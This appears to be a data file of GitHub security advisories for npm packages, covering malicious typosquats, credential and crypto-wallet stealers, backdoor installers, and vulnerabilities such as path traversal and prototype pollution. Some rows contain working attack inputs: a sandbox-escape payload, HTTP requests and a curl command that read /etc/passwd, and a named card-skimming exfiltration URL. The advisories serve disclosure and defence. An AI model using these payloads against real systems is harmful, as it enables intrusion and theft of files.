+Upgrade to version 2.6.0 or later and ensure sensitive information was not logged.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ibm_db'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ibmdb/node-ibm_db/issues/563'}, {'type': 'WEB', 'url': 'https://github.com/ibmdb/node-ibm_db/commit/526c88b5eedc605274def65405279f6708d91ce8'}, {'type': 'PACKAGE', 'url': 'https://github.com/ibmdb/node-ibm_db'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-IBMDB-459762'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1185'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:50:21Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vp8g-53fw-r9f2,2021-09-24T17:28:16Z,2020-09-01T19:54:44Z,,[],Malicious Package in dynamo-schema,"Version 0.0.3 of `dynamo-schema` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+If version 0.0.3 of this module is found installed you will want to replace it with a version before or after 0.0.3. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'dynamo-schema'}, 'versions': ['0.0.3']}]","[{'type': 'PACKAGE', 'url': 'https://github.com/andrewjstone/dynamo-schema'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DYNAMOSCHEMA-450992'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/626'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:30:24Z', 'nvd_published_at': None}"
+1.4.0,GHSA-w6xj-45gv-fw35,2023-07-27T20:12:24Z,2020-09-02T15:57:06Z,,[],Malicious Package in stream-combine,"Version 2.0.2 of `stream-combine` has malicious code design to steal credentials and credit card information. The code searches all form elements for passwords, credit card numbers and CVC codes. It then uploads the information to a remote server using HTML links embedded in the page or form actions. If your application has Content Security Policy set you are not affected by this issue.
+
+
+## Recommendation
+
+This package is not available on the npm Registry anymore. If you used this module and your application processed credentials or credit card information, it is possible that information was stolen.
+
+Users may consider downgrading to version 2.0.1",[],"[{'package': {'ecosystem': 'npm', 'name': 'stream-combine'}, 'versions': ['2.0.2']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/774'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:35:17Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9gxr-rhx6-4jgv,2020-08-31T18:55:36Z,2020-09-04T15:18:57Z,,[],Sandbox Breakout / Prototype Pollution in notevil,"Versions of `notevil` prior to 1.3.3 are vulnerable to Sandbox Escape leading to Prototype pollution. The package fails to restrict access to the main context, allowing attacker to add or modify an object's prototype.
+
+Evaluating the payload ```try{a[b];}catch(e){e.constructor.constructor('return __proto__.arguments.callee.__proto__.polluted=true')()}``` add the `polluted` property to Function.
+
+
+## Recommendation
+
+Upgrade to version 1.3.3 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'notevil'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.3'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1338'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:55:36Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qcc9-q247-3m2m,2021-09-30T20:17:10Z,2020-09-03T19:46:49Z,,[],Malicious Package in js-regular,"This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.
+
+
+## Recommendation
+
+Remove the package from your environment. There are no indications of further compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'js-regular'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1129'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:48:18Z', 'nvd_published_at': None}"
+1.4.0,GHSA-59x8-7wx6-4hj9,2021-09-30T20:01:35Z,2020-09-03T17:47:52Z,,[],Malicious Package in secure_identity_login_module,"All versions of `secure_identity_login_module` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'secure_identity_login_module'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1063'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:56Z', 'nvd_published_at': None}"
+1.4.0,GHSA-ch52-vgq2-943f,2020-08-31T18:46:28Z,2020-09-03T18:15:53Z,,[],Regular Expression Denial of Service in marked,"Affected versions of `marked` are vulnerable to Regular Expression Denial of Service (ReDoS). The `_label` subrule may significantly degrade parsing performance of malformed input.
+
+
+## Recommendation
+
+Upgrade to version 0.7.0 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'marked'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.4.0'}, {'fixed': '0.7.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1076'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:46:28Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m25q-fwg4-9v2p,2021-09-24T16:36:57Z,2020-09-01T19:47:07Z,,[],Malicious Package in awesome_react_utility,"Version 1.0.2 of `awesome_react_utility` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+## Recommendation
+
+If version 1.0.2 of this module is found installed you will want to replace it with a version before or after 1.0.2. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'awesome_react_utility'}, 'versions': ['1.0.2']}]","[{'type': 'PACKAGE', 'url': 'https://github.com/kooinam/awesome_react_utility'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/618'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:30:05Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8jf2-cq6v-w234,2021-09-29T20:47:08Z,2020-09-03T21:10:53Z,,[],Malicious Package in uglyfi.js,"Version 0.17.3 of `uglyfi.js` contains malicious code as a preinstall script. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed, the package downloads a file from a remote server, executes it and opens a backdoor.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'uglyfi.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1202'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:50:59Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8j49-49jq-vwcq,2020-08-31T18:55:30Z,2020-09-04T15:15:34Z,,[],Prototype Pollution in getsetdeep,"All versions of `getsetdeep` are vulnerable to prototype pollution. The `setDeep()` function does not restrict the modification of an Object's prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.
+
+
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'getsetdeep'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1334'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:55:30Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xmmp-hrmx-x5g7,2021-09-30T21:37:37Z,2020-09-02T21:32:22Z,,[],Malicious Package in bowe,"Version 1.8.4 of `bowee` contained malicious code as a preinstall script. The package downloaded a file from a remote server, executed it and opened a backdoor.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'bowe'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/899'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:39:50Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wc7q-qpm4-8pqv,2021-10-01T14:07:12Z,2020-09-02T20:32:10Z,,[],Malicious Package in rrequest,"All versions of `rrequest` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'rrequest'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/862'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:34Z', 'nvd_published_at': None}"
+1.4.0,GHSA-x8m7-cv39-xmg9,2021-09-30T16:35:22Z,2020-09-03T22:56:10Z,,[],Malicious Package in jq-sha3,"Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'jq-sha3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1278'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:53:31Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4jfq-q299-g4cr,2021-10-01T14:06:36Z,2020-09-02T20:28:57Z,,[],Malicious Package in reqquest,"All versions of `reqquest` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'reqquest'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/860'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:30Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hg5q-rj62-c43g,2021-09-30T21:26:33Z,2020-09-02T21:29:08Z,,[],Malicious Package in reqest,"All versions of `reqest` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'reqest'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/895'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:39:41Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p3jx-g34v-q56j,2021-09-30T16:31:54Z,2020-09-03T22:54:02Z,,[],Malicious Package in j3-sha3,"Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'j3-sha3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1276'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:53:26Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2fwq-wx47-hm6x,2021-10-01T20:30:20Z,2020-09-04T15:31:39Z,,[],Malicious Package in bcion,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bcion'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1352'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:56:04Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9chw-xrwx-f86j,2023-09-13T22:54:41Z,2020-09-01T16:07:53Z,,['CVE-2016-10649'],frames-compiler downloads Resources over HTTP,"Affected versions of `frames-compiler` insecurely download an executable over an unencrypted HTTP connection.
+
+In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `frames-compiler`.
+
+
+## Recommendation
+
+No patch is currently available for this vulnerability.
+
+The best mitigation is currently to avoid using this package, using a different package if available.
+
+Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'frames-compiler'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-10649'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/247'}]","{'cwe_ids': ['CWE-311'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:16:20Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wjf2-7f9g-86f5,2021-09-30T20:05:43Z,2020-09-03T18:23:38Z,,[],Malicious Package in fast-requests,"All versions of `fast-requests` contain obfuscated malware that uploads Discord user tokens to a remote server. This allows attackers to make purchases on behalf of users if they have credit cards linked to their Discord accounts.
+
+
+## Recommendation
+
+Remove the package from your environment. Review your Discord account access and rotate tokens if possible. If a credit card was linked to a compromised account contact your credit card company.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'fast-requests'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1086'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:46:49Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cqv6-7fwc-8m3c,2023-09-11T23:14:59Z,2020-09-01T16:44:59Z,,['CVE-2017-16091'],Directory Traversal in xtalk,"Affected versions of `xtalk` are vulnerable to directory traversal, allowing access to the filesystem by placing ""../"" in the URL.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:localhost
+```
+
+
+
+
+## Recommendation
+
+No patch is currently available for this vulnerability, and the package has not been updated since 2014.
+
+The best mitigation is currently to avoid using this package, and using a different, functionally equivalent package.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'xtalk'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16091'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/339'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:19:52Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h3m2-h22h-695r,2021-09-30T17:49:52Z,2020-09-03T17:29:31Z,,[],Malicious Package in ali-contributor,"All versions of `ali-contributor` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'ali-contributor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1045'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:17Z', 'nvd_published_at': None}"
+1.4.0,GHSA-g87g-4x3w-f8jp,2023-09-08T18:50:49Z,2020-09-01T16:51:28Z,,['CVE-2017-16105'],Directory Traversal in serverwzl,"Affected versions of `serverwzl` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'serverwzl'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16105'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/serverwzl'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/363'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:20:29Z', 'nvd_published_at': None}"
+1.4.0,GHSA-f3vw-587g-r29g,2020-08-31T19:01:20Z,2020-09-03T15:50:38Z,,[],Path Traversal in sapper,"Versions of `sapper` prior to 0.27.11 are vulnerable to Path Traversal. It is possible to access sensitive files on the server through HTTP requests containing URL-encoded `../`.
+
+You may test a `sapper` application running in prod mode with `curl -vvv http://localhost:3000/client/750af05c3a69ddc6073a/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd`.
+
+
+## Recommendation
+
+Upgrade to version 0.27.11 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'sapper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.27.11'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1494'}]","{'cwe_ids': ['CWE-22'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:01:20Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qv78-398w-cxp7,2021-09-30T22:00:05Z,2020-09-11T21:08:19Z,,[],Malicious Package in shrugging-logging,"All versions of `shrugging-logging` contain malicious code as a postinstall script. The package fetches all names of npm packages owned by the user and attempts to add another maintainer to every package as a means of package hijacking,
+
+
+## Recommendation
+
+Remove the package from your system. If you own any packages that were compromised please contact npm security immediately at security@npmjs.com. Also enable 2FA for publishing to further secure packages you maintain.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'shrugging-logging'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/920'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:40:36Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4x6x-782q-jfc4,2020-08-31T18:41:45Z,2020-09-03T02:38:47Z,,[],Command Injection in node-wifi,"Versions of `node-wifi` prior to 2.0.12 are vulnerable to Command Injection. The package fails to sanitize user input, allowing attackers to inject commands through the `ssid` variable and possibly achieving Remote Code Execution on the system.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'node-wifi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.12'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/952'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:41:45Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7frr-c83r-fm22,2021-09-29T21:26:37Z,2020-09-03T22:20:49Z,,[],Malicious Package in buffez-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffez-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1259'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:52:46Z', 'nvd_published_at': None}"
+1.4.0,GHSA-73hr-6785-f5p8,2021-09-30T21:24:59Z,2020-09-02T21:24:55Z,,[],Malicious Package in donotinstallthis,"The package `donotinstallthis` contained malicious code. The package contained a script that was run as part of the install script. The script contacted a remote service tracking how many installations were done. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your environment.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'donotinstallthis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/887'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:39:25Z', 'nvd_published_at': None}"
+1.4.0,GHSA-frcq-4ffq-v4mw,2023-09-11T20:34:25Z,2020-09-01T18:12:07Z,,['CVE-2017-16211'],Directory Traversal in lessindex,"Affected versions of `lessindex` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'lessindex'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16211'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/lessindex'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/423'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:22:33Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8hmr-w35f-3qgj,2021-09-29T20:46:19Z,2020-09-03T21:07:37Z,,[],Malicious Package in harmlesspackage,"Version 0.0.1 of `harmlesspackage` contains malicious code as a postinstall script. The package printed a message to the console and performed a GET request to a remote server.
+
+
+## Recommendation
+
+Remove the package from your environment. There is no evidence of further compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'harmlesspackage'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1199'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:50:52Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7ww4-c3mj-93cf,2021-01-14T15:56:19Z,2020-09-01T16:16:33Z,,['CVE-2016-10693'],Downloads Resources over HTTP in pm2-kafka,"Affected versions of `pm2-kafka` insecurely download an executable over an unencrypted HTTP connection.
+
+In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `pm2-kafka`.
+
+
+## Recommendation
+
+No patch is currently available for this vulnerability.
+
+The best mitigation is currently to avoid using this package, using a different package if available.
+
